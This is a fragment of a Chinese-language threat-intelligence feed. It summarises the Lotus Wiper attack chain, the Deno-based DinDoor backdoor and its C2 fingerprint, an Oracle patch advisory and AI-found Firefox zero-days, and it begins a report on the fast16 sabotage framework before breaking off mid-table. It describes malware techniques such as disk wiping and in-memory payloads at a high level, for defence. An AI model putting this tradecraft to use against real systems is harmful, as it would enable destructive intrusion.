leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Lotus Wiper：针对能源和公用事业领域的新威胁</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://securelist.com/tr/lotus-wiper/119472/" target="_blank">https://securelist.com/tr/lotus-wiper/119472/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在针对委内瑞拉能源和公用事业部门的破坏性攻击中，攻击者使用两个批处理脚本启动攻击链，通过检查远程XML文件作为网络触发信号，禁用系统服务、修改用户密码、关闭网络接口、利用diskpart和robocopy等工具覆盖磁盘内容，最终解密并执行名为Lotus Wiper的擦除器；该擦除器删除系统还原点、向所有物理磁盘扇区写入零数据、清除更新序列号日志并强制删除所有文件，使系统无法恢复。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">研究人员发现 DinDoor 后门 20 台活跃的 C2 服务器</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月21日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis" target="_blank">https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DinDoor是一种利用Deno运行时执行恶意JavaScript的后门，通过MSI文件交付，绕过了仅监控PowerShell或Node.js的环境；两个分析样本均使用相同的指纹算法生成唯一受害者ID，但一个样本将JWT令牌嵌入C2 URL中暴露了与MuddyWater关联的战役信息，另一个样本则将载荷直接传入内存执行而不落地；C2服务器的HTTP响应具有一致的“Via: 1.1 Caddy”头特征，可据此识别出20个活跃的C2节点；建议组织监控deno.exe的异常执行、限制MSI运行、阻止相关域名和Caddy特征流量。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8886075949367088" data-s="300,640" data-type="png" data-w="790" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034880" src="https://wechat2rss.xlab.app/img-proxy/?k=fd133c6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq8YMsLribqNLFJSkmUebXYicmUicfBobicO4xvvYsWlDM8Vezx0aIOhm92ibg61EsC30yScyBKmlyEh81DN4GKDHDia6VVFrnBbhQUOw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034883" src="https://wechat2rss.xlab.app/img-proxy/?k=db23291e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq88fo2hkLRwh5jPa1tBWK3F6FoEU2FUb4hJoZiapfEnOxy1iaFP9J01t3OlPaSsZ7k452ia91IdK0zT6y0qZEDobxL7TXFKfzRib9c%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034885" src="https://wechat2rss.xlab.app/img-proxy/?k=86978d2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqicHal5d3wS6NK9viaibv2mia84cLZBHWSicv3LZul7qt8iauicWdOJXGtJ5XvneicMaibPpBOs1iaKBlRSRaUn9zOGIpjPXZ0joT3zvg7NE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034887" src="https://wechat2rss.xlab.app/img-proxy/?k=a6790ebc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8kA3vWEDzZpsRia7YpEczJDr5ibQqcpRgZTByLAwgrRSX32zAVqPCPDZdRShUFiao8xG6tfj9XiaFsnOcANSsR0w2LbibbL8hicFlbc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034884" src="https://wechat2rss.xlab.app/img-proxy/?k=3148ce67&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqicKicrODopzuw79yCLicPcEyrduwBBSoSanOExcic6rXak73ESdY8esjsmmUx8DrrZGHq8vY747Z31ueBEHSvonfQtazBgeicZaS4E%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Oracle 2026年4月补丁日多产品高危漏洞安全风险通告</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月22日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/yawZXSHEaVPOGELMEQmOxA" target="_blank">https://mp.weixin.qq.com/s/yawZXSHEaVPOGELMEQmOxA</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Oracle官方发布了2026年4月的关键安全补丁集合更新CPU（Critical Patch Update），修复了多个漏洞包括 CVE-2026-34305、CVE-2026-34315、CVE-2026-34270 等。其中Oracle WebLogic Server信息泄露漏洞(CVE-2026-34305)、Oracle MySQL Shell Core Client信息泄露漏洞(CVE-2026-34318)影响相对较大。奇安信CERT建议客户尽快自查并应用本次关键安全补丁集合（CPU）。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Claude Mythos AI 模型发现 Firefox 中存在 271 个零日漏洞</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月22日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://cybersecuritynews.com/claude-mythos-271-zero-days/" target="_blank">https://cybersecuritynews.com/claude-mythos-271-zero-days/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Anthropic的Claude Mythos预览版模型在与Mozilla Firefox的合作中，单次评估发现了271个零日漏洞，全部在Firefox 150中修复，这是浏览器历史上最大规模的安全更新；此前Claude Opus 4.6已发现22个漏洞，而Mythos展现了自主发现和利用漏洞的能力，并在OpenBSD、FFmpeg等基础设施中找到了埋藏数十年的古老缺陷，标志着AI驱动的漏洞发现正扭转攻防不对等的局面。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034886" src="https://wechat2rss.xlab.app/img-proxy/?k=7d091a37&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8GMsfn5F1tI1Oc4iadtqtkXNMiaHvc0cA1kM3jueicuPoKlR4aVWeTxHjaN1fqcwBPmpIPAVBo3bG2u2yRhaeJzahbgaTMFczjRA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.1</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=ab71b3de&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518546%26idx%3D1%26sn%3Dcec3e7e78a12edb9669b75629b7b3888">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 11:56:00 +0800</pubDate>
    </item>
    <item>
      <title>追踪史上首个国家级高精度计算破坏框架——&#34;fast16&#34;深度报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518546&amp;idx=2&amp;sn=971c24fad06958dad96bcd52816243ef</link>
      <description>SentinelLABS披露了可追溯至2005年的国家级网络破坏框架fast16，其设计理念与技术架构远超同时代恶意软件至少五年。该框架专门针对超高精度计算软件实施破坏活动，代表了国家级网络攻击能力的早期实践，比震惊全球的Stuxnet（震网病毒）事件至少早五年出现。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-24 11:56</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=ffd3fcd7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicEzK0kXqsNAmcImOg35boCibRSllBgGeAM3w1cGozXeVPelSY27a4Ip6a3xic66IGmmxO0Q2WqyOECsyQhK3rOUblhpepMgbNY0%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>SentinelLABS披露了可追溯至2005年的国家级网络破坏框架fast16，其设计理念与技术架构远超同时代恶意软件至少五年。该框架专门针对超高精度计算软件实施破坏活动，代表了国家级网络攻击能力的早期实践，比震惊全球的Stuxnet（震网病毒）事件至少早五年出现。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">背景概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心在持续追踪境外高级持续性威胁（APT）组织活动过程中注意到，SentinelLABS披露了一起具有里程碑意义的发现：一个可追溯至2005年的国家级网络破坏框架</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">fast16</span></strong><span leaf="">，其设计理念与技术架构远超同时代恶意软件至少五年。该框架专门针对超高精度计算软件实施破坏活动，代表了国家级网络攻击能力的早期实践，比震惊全球的Stuxnet（震网病毒）事件至少早五年出现。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这一发现对理解APT攻击演进路径具有重要价值。fast16所展现的模块化设计思维、嵌入式脚本引擎应用、以及针对关键计算基础设施的定向破坏模式，在后续十余年间的多起APT攻击事件中均可看到其影子。对于国内关键信息基础设施防护而言，深入剖析这类早期高级攻击框架的技术特征，对于识别和防御同类威胁具有重要的现实意义。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">技术架构分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">载体模块：svcmgmt.exe</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16框架的核心载体为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">svcmgmt.exe</span></strong><span leaf="">，该二进制文件呈现出典型的高阶国家级攻击工具特征。文件编译时间为2005年8月30日，大小为315,392字节，PE头部标识为Windows 2000/XP时代的控制台模式服务包装器。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该载体的技术架构极具前瞻性。攻击者在svcmgmt.exe中嵌入了完整的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">Lua 5.0虚拟机</span></strong><span leaf="">，这一设计在2005年尚属首创，比已知最早采用相同架构的Flame攻击平台提前三年。Lua引擎的引入使得攻击者能够在不重新编译整个植入体的情况下，动态加载和更新功能模块，这一理念与现代APT攻击的模块化设计完全一致。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">载体内部对Lua环境进行了深度定制扩展：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 